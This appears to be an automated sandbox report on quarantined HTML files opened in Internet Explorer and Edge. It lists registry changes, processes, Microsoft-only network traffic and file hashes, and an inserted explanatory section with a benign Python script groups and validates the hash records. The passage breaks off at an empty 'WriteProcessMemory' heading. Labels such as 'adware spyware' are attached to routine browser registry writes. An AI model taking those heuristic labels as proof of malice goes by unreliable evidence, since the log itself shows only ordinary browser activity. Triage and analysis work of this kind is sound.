Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0e51e1ba688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabDF3B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarE145.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aad4420223b462cc4e11176a5d9b60bf
SHA1 f98e8abfc0d08c2e385c7e69fc3b1a8b78648a23
SHA256 6923c694b900ebdb59154fb5c9d597f64622411127018bdda6908bc3e8295bac
SHA512 43f3de6cd2f43cc10f47f739c094b2ce8a0f2b586ee2ec7cefcb16ff8b222a3ec7d375ffd84cdb49adc9d4447560984d23896f280d73e3d125122b4569920d3c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 15e13a074abacb2769d0f241c9020d75
SHA1 d0410a1869f6db1603a6d0458356d64c27e1c912
SHA256 1b2fbf8084388e08210ce478d6656d9d2e5c18223c23d6f05bc468dcec415249
SHA512 84a5ee4b2c74a31d60e71988c970b3ed75c4fdbc58aeac4bfa0822b66f70176e614a113cada75c751fa804b001142331ec116b97e00a1acd32185636fb055dff

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 383174a7db12d10a5fcf627cc30dde4d
SHA1 a0f41aa6e7b6bb4459a41eea70a2efc4b1a0f14e
SHA256 742d8b88c82d22956b3f755f4150468f38fc33c729be911d24b41b3a33eb32a8
SHA512 1818ec8fc46e1b44c9d74d90da783269e49163ac69e57c26a8336e4f920ab2a1b0d04910451bb6276558c12b224e3483035057e7606c7e6af798e5067eb8759f

Analysis: behavioral20

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240729-en

Max time kernel

133s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008f2ad785859e0c48bc39fdee908bd4c900000000020000000000106600000001000020000000170fe8fad6ab3cc8a19223c139a347fb3d589c0727943e41aa2ce40d68f5339f000000000e8000000002000020000000c76d1044721d79509e6bccfda9be16bb2d13d676f7e803ad9add7694ff67fd6220000000fbc50f55b4bb1ecbc6e1d2146ea615cc482ec4f5df17075113510f83d5f4d1cb400000008446b9037a590a8d156e0815007514c211816ea2c04a845ccc772cfe764c401f4d26005420f27a833cdda8815da9823b6b3f23f13987f7afa7e35310e489649d C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469F5EF1-F499-11EF-9816-E6BB832D1259} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d013091ba688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2508 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabBC6E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarBD12.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d29a70f13cbc98c2fbc5265faa6d8452
SHA1 675f7be44bed52e978536ff40ae4dba79d461579
SHA256 6b7283e00986c2245c84db9f37a5fc07bc8ec153e92623d3d22bf384981faefe
SHA512 acf0f97f06d5768d06c27aacd10f065e89b98e03619afe329f222e2cc93e9403c4fa868dcf99fe3942ac2599fc1cc6a4de2da9e04031828e7186790bd087dc90

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 008fb14948d895fe06161b41f3dd40dc
SHA1 236e9088245f966d1d3b8d61d1ef8a53f40c2ede
SHA256 07fe9ebfce837d96db6315c684395d686e017037d68148757475bd2dc8841da2
SHA512 3d6a9ab9d0b5acaee193b7afe25fe4603da1d95d2e9a7c9ff543d6021e9d6aee03ce387bc3b3e9c113fe6d9527dafe11aaeb3f4fdff124a3fb504aab2e3dc75e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1de47cfd09be9baa5255339c943651eb
SHA1 f62b3ca5dcd0516e052f557a3a87244ca4a39126
SHA256 8a027b7d7596d97b2ebc42bf11d26189c0db3b6ad60b57ff890084952ada2152
SHA512 a5a5f7a4855a09e503fedccf42df2ad376317f19774863f20970da677a0f1d06aca5cd22e98ef076e6aad60923387275ab34cce3ecdfb7cdd62608710b17ba3d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7f6239fa10aff3cb4690759b0c79811
SHA1 a3116847b44fd00b0d6bd1dfe993622134665a90
SHA256 1d3ec3df0de9bf8305ff473f8afd7b8c744ea95d77ebc52d8b56bbf6e866d4af
SHA512 494957a7246973cce25e36d2c24da337bd4d1025a8d054ae615d1457c5f1aef1409f8f7ba54f76fb6fa7db9943bde196a70d8b8d114b1f6b0194868c2beeeed9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cfbe20caf872b679aa4560331777f66e
SHA1 d0830b7ee39cacdc6ccef849f02b1a07f9d6ddad
SHA256 2b7ee6b48f8b092f734f9a1db2d0606e7637683cc705a66140d8264e775781f3
SHA512 5f63c33ba37507e58554f8d132b65296a73ca3a1135f16a4d811b1d0c286b9f113c7a2447f51e329a56381b01cb5317a12c8ba7f819e0fa5de949a90ae530ec5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4d7c66ce8288f7018d32ceb11aef4aeb
SHA1 06af6298ae718a162803a3b514baa967b9dff1a8
SHA256 3ca65d048b15ff48ec5de6c4acff74645e0c6e02999cbf1177f794a3df30d140
SHA512 b31b710856650ea3a49131adf7c7bd74d0dc1c5ee72517b612e937a96701ac008a80897fa9ed9f9919216cbf1f39afe453ec6cf78d08c57ba0ae21ac2c47327d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3663fe71a47523fc22a053ed29fb060c
SHA1 fb63729809acfae3c3694b84c11b5fdbd5306913
SHA256 c4e1129a1b00ba265694ed9537f5ed0819adddc0d799aaeec9bbad88f66a4c8e
SHA512 24ff8ef001601ae26c55e490e0086502ac6c5a9d5c4bdb52a73a2629e7f62a4cbef04e2c408d094a3b916e8c17f421b51790f589b81ae0defca9f4d7d7cbaa24

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dad1c35eef418e53f8ed391d03774357
SHA1 2e84dd9f330173ac298dc10f270be2738f51f93c
SHA256 93f38530b5dbf78068b57034962ecbd11e2b42f27304353d804517ed064b0fe3
SHA512 e9221803f6cbd2315f74b6c63e85e0d7721d7e3cc27744e692c2f155abb4cee660d7a6a456ab9717fcf9db16969b34a3484bd7ba91ebeec2e1af8fa0f921a9df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c183dce1eec15e6cfe796b6e21b25d9a
SHA1 7d6715713a45e89a02b3f5cbaaa18e26f10bb9dd
SHA256 32e9951fa18f911b2ad8d36969e8e344c97717c99eb2a348da7a143bd991d8de
SHA512 defc18c67cc2c4446c45697526619d245dc9959ddca2abbc86ca9fbe6770e359b9b8b3c648e64ed008bf48d3def93c464f922281648286414dde6c00932a8af7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6678198d3465a7bc78922226d64a9abc
SHA1 9da83be60ed28f534c6ab51157e535d7eb2f01c0
SHA256 3b8acd6fa66ff22a7e5b11fb35023c9ccf143e712ef76363625eb17bcb5a0c9e
SHA512 c795b5ae15df88d99c097f725249823344b41b94d19b5796b16fca8809e03e7d02cab246bdb90d8fe6805e4bab78f3e81ad484f4f804edd21ecd69f13f99efb5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 844771f82e017e357a7f57a95a4436c3
SHA1 3143709c91ab3c580b47e29f7008daaad07a120c
SHA256 b1722b6a31dd41392a55233adeb8715a37faa7cb1087d438aa29d18836a22023
SHA512 76f5d716855b6689b7134a03254e51e45bdb89e7f4d3d4c7feb3a9a831511dfe94faa95540dc36dbbad7a0fac3803683c08615bcb4439b8065d62014f2c621e5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c1d0471abc34cd8ec67d8819c9d5e98
SHA1 b26a6cdaa967d043f85a69f06974c9f7ed4da71a
SHA256 d4225411f14175930cad72048e14b38a87984a6ba6f06db52bbaf2b1bb4a1362
SHA512 d8c2d765c9eb4bd98e3cfed3d3e49e4be4ab753e04efbf2514928ef9f750387aeef19c8913dd55221e1539612e8a0580909331088bb8d8ba3da8ff3b0282e591

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 851c490ac86d2782d929ef8be2907407
SHA1 53de2951d97b673733edcdd6110fee61c7bb4162
SHA256 49c5bdd64f79eb3881d16d70c78c56024046205ee8b9881fe1944c77b39f0ba2
SHA512 dfd9abc5fbffd1d63fc932673b74b7bc69c3e28d5cc587fa9a72560023fd2db558c9aa928158fd3ed0527a48e28c95766b2f3038fa5bf3ec799fdcbf09a6c0e5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80421b23939e2bf9dd5a78f6dc08fc4f
SHA1 739488a553fe9c3c7fc6915625dcab5746f31762
SHA256 0ad318f3fb209c7aaeb5c3d7fc8c6944353f9eab78a5fc5c2f9415ce320ea4ec
SHA512 4bd192a72756815edec030a3d6759d0e3619f3bbe2d881f1d41ca848e61d03e732758ffa84251b8f30c2c67c713b535169a0938fe18915727b960d16f7c0b453

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e5540eda9b6908bc97f4b7c6a89904a
SHA1 97760dadf1151584873fcef670ebabdac0e2ff35
SHA256 4e5717e0b7d19ef6c2da10d28302178cfaa4e37aa70f662430be8e69a30e6368
SHA512 7d9c07f073837bdd9a12b4f5815043f5b4d46b407301edc53df80073d7033a1bd72c42530576315b196b67de92c0dc5de0f8b2085e7b607de36664b04c02a629

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 59a6bab55f00f57d1a9125ab1ce342e7
SHA1 c1a9177ca9f272d89d264381600b3bb3048fbecd
SHA256 536a8ca805679545689b8934ae10f0c1c28eac9a4246ce9d8fb46bd5d57ad2f3
SHA512 681b1e35651d87bbf03011a7c3729186f9e1858f92719e0375d9db21e768be3fc9f10b0de1069be0451fc0b2cae100f42880f68326eec495728714956bbdc83e
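The Files list above records the same CryptnetUrlCache MetaData path sixteen times with different digests. CryptoAPI's URL cache (used for CRL, OCSP and AIA retrieval) updated that entry repeatedly during the IE detonation, so each row is one version of one file rather than sixteen files, and the CabBC6E.tmp / TarBD12.tmp pair is the usual temporary pair left by that same cache update. The script below is an added example written for this page; it is not code from the report or from the sandbox's own tooling. It parses constructed copies of a few of the records above (plus a hypothetical zero-byte named-pipe record and one deliberately truncated copy of the TarBD12.tmp record), groups them by path with their distinct SHA256 versions, validates digest lengths, and flags zero-byte artefacts by the well-known empty-input digests.

```python
"""Group and sanity-check the per-file hash records of a sandbox "Files"
section.  Added example, not part of the report.  Record layout parsed is
the one used above: a path line, then MD5 / SHA1 / SHA256 / SHA512 lines."""
import hashlib
import re
from collections import OrderedDict

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()   # digest of a zero-byte file
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")

# Constructed sample: copies of records from the report, the first MetaData
# record repeated once, a hypothetical zero-byte pipe, and a TarBD12.tmp copy
# with its SHA1 shortened and its SHA512 dropped to exercise validate().
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\CabBC6E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d29a70f13cbc98c2fbc5265faa6d8452
SHA1 675f7be44bed52e978536ff40ae4dba79d461579
SHA256 6b7283e00986c2245c84db9f37a5fc07bc8ec153e92623d3d22bf384981faefe
SHA512 acf0f97f06d5768d06c27aacd10f065e89b98e03619afe329f222e2cc93e9403c4fa868dcf99fe3942ac2599fc1cc6a4de2da9e04031828e7186790bd087dc90

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 008fb14948d895fe06161b41f3dd40dc
SHA1 236e9088245f966d1d3b8d61d1ef8a53f40c2ede
SHA256 07fe9ebfce837d96db6315c684395d686e017037d68148757475bd2dc8841da2
SHA512 3d6a9ab9d0b5acaee193b7afe25fe4603da1d95d2e9a7c9ff543d6021e9d6aee03ce387bc3b3e9c113fe6d9527dafe11aaeb3f4fdff124a3fb504aab2e3dc75e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d29a70f13cbc98c2fbc5265faa6d8452
SHA1 675f7be44bed52e978536ff40ae4dba79d461579
SHA256 6b7283e00986c2245c84db9f37a5fc07bc8ec153e92623d3d22bf384981faefe
SHA512 acf0f97f06d5768d06c27aacd10f065e89b98e03619afe329f222e2cc93e9403c4fa868dcf99fe3942ac2599fc1cc6a4de2da9e04031828e7186790bd087dc90

\??\pipe\LOCAL\example_pipe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TarBD12.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
"""


def parse_file_records(text):
    """Return a list of {"path": ..., "MD5": ..., ...} dicts, one per record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2).lower()
        else:                       # any non-digest line starts a new record
            current = {"path": line}
            records.append(current)
    return records


def validate(record):
    """List the digests that are missing or have the wrong hex length."""
    problems = []
    for name, length in DIGEST_LEN.items():
        value = record.get(name)
        if value is None:
            problems.append(f"missing {name}")
        elif len(value) != length:
            problems.append(f"bad {name} length {len(value)}")
    return problems


def group_by_path(records):
    """Map path -> ordered list of distinct SHA256 versions seen for it."""
    groups = OrderedDict()
    for rec in records:
        versions = groups.setdefault(rec["path"], [])
        sha = rec.get("SHA256")
        if sha and sha not in versions:
            versions.append(sha)
    return groups


def empty_files(records):
    """Paths whose content digest is that of zero bytes (pipes, placeholders)."""
    return sorted({r["path"] for r in records if r.get("SHA256") == EMPTY_SHA256})


if __name__ == "__main__":
    recs = parse_file_records(SAMPLE_FILES)
    for path, versions in group_by_path(recs).items():
        print(f"{len(versions)} version(s)  {path}")
    for rec in recs:
        for problem in validate(rec):
            print(f"{rec['path']}: {problem}")
    print("zero-byte:", empty_files(recs))
```

Grouping by path before looking at anything else turns the sixteen MetaData rows into one line with sixteen versions, which is the shape an analyst actually reasons about; the length check catches copy-and-paste damage to a digest before it is fed to a lookup service.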

Analysis: behavioral21

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

150s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(25 identical rows collapsed into one)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(24 identical rows collapsed into one)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
